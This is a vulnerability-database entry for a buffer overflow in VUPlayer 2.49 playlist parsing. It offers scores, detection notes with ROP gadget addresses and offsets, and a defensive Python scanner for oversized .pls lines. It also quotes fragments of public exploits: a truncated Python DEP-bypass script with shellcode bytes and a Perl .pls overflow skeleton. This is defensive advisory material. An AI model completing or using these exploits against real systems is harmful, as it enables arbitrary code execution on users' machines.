CVE-2009-0182
Published 2009-01-20
Priority P3 · 53 · high · 8.8 CVSS 3.1
AV:N / AC:L / PR:N / UI:R / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 48.40% (98.7th percentile)
Buffer overflow in VUPlayer 2.49 and earlier allows user-assisted attackers to execute arbitrary code via a long URL in a File line in a .pls file, as demonstrated by an http URL on a File1 line.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vuplayer | vuplayer | <= 2.49 | — |
Detection & IOCs (extracted from sources)
- Detect malicious .pls playlist files containing an abnormally long URL (>1012 bytes) on a File1= line, consistent with the buffer overflow trigger pattern.
- Detect VUPlayer opening .wax or .cue files with payloads exceeding 1012 bytes of junk before ROP chain (stack-based overflow in VUPlayer <= 2.49).
- Monitor for VUPlayer process loading BASS.dll and BASSMIDI.dll with ROP chain execution; these modules are used as no-ASLR gadget sources for DEP bypass.
- Flag .pls playlist files with a [playlist] header where File1= value contains an HTTP URL longer than typical media paths; exploit uses overflow after 'File1=http://'.
- Detect known bad characters \x00, \x0a, \x1a being avoided in shellcode; presence of shellcode in .wax/.pls/.cue files that avoids these bytes is a strong exploit indicator.
- Detect use of mona ROP chain generation targeting BASS.dll and BASSMIDI.dll with bad-char exclusions matching CVE-2009-0182 exploit tooling.
- This module exploits a stack-based overflow via a specially crafted .cue file in VUPlayer <= 2.49; monitor for VUPlayer process spawning child processes after opening .cue files.
- The ROP gadget addresses (e.g., 0x10015f77, 0x1060e25c) are specific to the versions of BASS.dll and BASSMIDI.dll shipped with VUPlayer 2.49 on Windows 7 x64; they will not be reliable across different builds or OS versions.
- The exploit was tested specifically on Windows 7 x64; DEP bypass via ROP chain may not apply to other Windows versions or configurations where ASLR is enforced on these DLLs.
- The .pls exploit uses a 'Universal Address' approach (NOP sled + shellcode), suggesting the EIP overwrite offset may vary slightly by environment; the 1012-byte junk offset is specific to the .wax variant.
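
A triage check for the .pls detection notes above, added here as an example (it is not code from the page's sources): it flags `FileN=` entries whose value exceeds the 1012-byte figure quoted above, or whose http URL carries non-printable bytes. The function name, reason labels and sample playlists are constructed for illustration, and the length threshold is a parameter because the page notes the offset varies by variant.

```python
import re

# Threshold from the detection note above (>1012 bytes on a File line).
MAX_FILE_VALUE = 1012
FILE_LINE = re.compile(rb"File(\d+)=(.*)", re.IGNORECASE)


def scan_pls(data: bytes, max_len: int = MAX_FILE_VALUE) -> list:
    """Return one finding per suspicious FileN= entry in raw .pls bytes."""
    findings = []
    # Split on any run of CR/LF so CRLF, LF and bare-CR files all parse.
    for raw in re.split(rb"[\r\n]+", data):
        m = FILE_LINE.fullmatch(raw.strip(b" \t"))
        if not m:
            continue
        value = m.group(2)
        reasons = []
        if len(value) > max_len:
            reasons.append("length")
        # URLs are ASCII text; raw bytes inside one are not expected.
        # Local paths are skipped here because they may be legitimately non-ASCII.
        is_url = value.lower().startswith((b"http://", b"https://"))
        if is_url and any(b < 0x20 or b > 0x7E for b in value):
            reasons.append("non-printable")
        if reasons:
            findings.append(
                {"entry": int(m.group(1)), "length": len(value), "reasons": reasons}
            )
    return findings


# Constructed samples with inert filler; not taken from any exploit.
BENIGN = b"[playlist]\r\nNumberOfEntries=1\r\nFile1=http://radio.example/stream.mp3\r\n"
OVERSIZED = b"[playlist]\r\nNumberOfEntries=1\r\nFile1=http://" + b"A" * 2000 + b"\r\n"
BINARY_URL = b"[playlist]\r\nFile1=http://host.example/" + b"\x90" * 24 + b"\r\n"

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("oversized", OVERSIZED),
                         ("binary-url", BINARY_URL)]:
        print(name, scan_pls(sample))
```

A hit is a reason to quarantine the playlist for review, not proof of exploitation; tune `max_len` to the longest legitimate stream URL seen in your environment.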
CVSS provenance
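| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |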
No detection rules found.
Exploit-DB
VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
exploitdb·2022-01-10·CVSS 8.8
---
# Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
# Date: 26/06/2021
# Exploit Author: Bryan Leong
# Vendor Homepage: http://www.vuplayer.com/
# Software Link: [Null]
# Version: VUPlayer 2.49
# Tested on: Windows 7 x64
# CVE : CVE-2009-0182
# VUPlayer 2.49 Local Buffer Overflow to Arbitrary Code Execution (Importing .wax playlist file) (Bypass DEP protection)
import struct
#shellcode
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f python
buf = b""
buf += b"\xd9\xea\xba\x33\x44\x3b\x11\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\x27\xa6"
buf += b"\xce\xed\xaf\xa4\x31\x0e\x2f\xc9\xb8\xeb\x1e\xc9\xdf"
buf += b"\x78\x30\xf9\x94\x2d\xbc\x72\xf8\xc5\x37\xf6\
Exploit-DB
VUPlayer 2.49 - '.pls' Universal Buffer Overflow
exploitdb·2009-01-07
---
#!/usr/bin/perl
# VUPlayer Universal Address
my $nopsled = "\x90" x 24;
open(my $pls_playlist, "> s.pls");
print $pls_playlist "[playlist]\r\n".
"NumberOfEntries=1\r\n".
"File1=http://".
$overflow.$eip.$nopsled.$shellcode.$overflow.
"\r\n";
close $pls_playlist;
# milw0rm.com [2009-01-07]
Metasploit
VUPlayer CUE Buffer Overflow
metasploit
This module exploits a stack-based overflow in VUPlayer <= 2.49. When the application is used to open a specially crafted cue file, a buffer is overwritten, allowing for the execution of arbitrary code.
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/165489/VUPlayer-2.49-Buffer-Overflow.html
- http://securityreason.com/securityalert/4923
- https://exchange.xforce.ibmcloud.com/vulnerabilities/48170
- https://www.exploit-db.com/exploits/7695